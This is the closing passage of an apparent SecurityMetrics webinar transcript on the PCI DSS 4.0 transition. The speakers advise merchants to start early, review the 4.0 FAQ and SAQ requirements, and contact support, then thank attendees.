Well, absolutely. And and we've been we've been using that a lot lately and finding great results and and seeing the issues coming from from that side of things, from the ecommerce side of things. And so the inspect and monitor tools are are wonderful assets that that merchants can use.
K. Any final tips or advice about four dot o?
I think my biggest tip is don't worry too much. You know? Don't stress over this transition.
But but also, like Scott was saying, don't wait. You know? Start now. Take a look at what the the four point o FAQ looks like for for your environment and and determine, you know, if there are any additional requirements that you were not used to validating in the past. And if there are new requirements, look at what would be required to be able to affirmatively answer those, new requirements in your SAQ four point o.
And Mike's absolutely correct. Don't stress over this.
Worst comes to worst, call Security Metrics. We have a support team that's there twenty four seven to answer your questions and to help you get through the process.
That's what they're there for.
Thank you for joining us on the webinar today. We appreciate the time that you spent with us in in learning about four point o. We will be sending out the recording of this webinar to you. And if we didn't respond to your questions, we apologize, and we will reach out to you to give you an answer soon.
.svg)
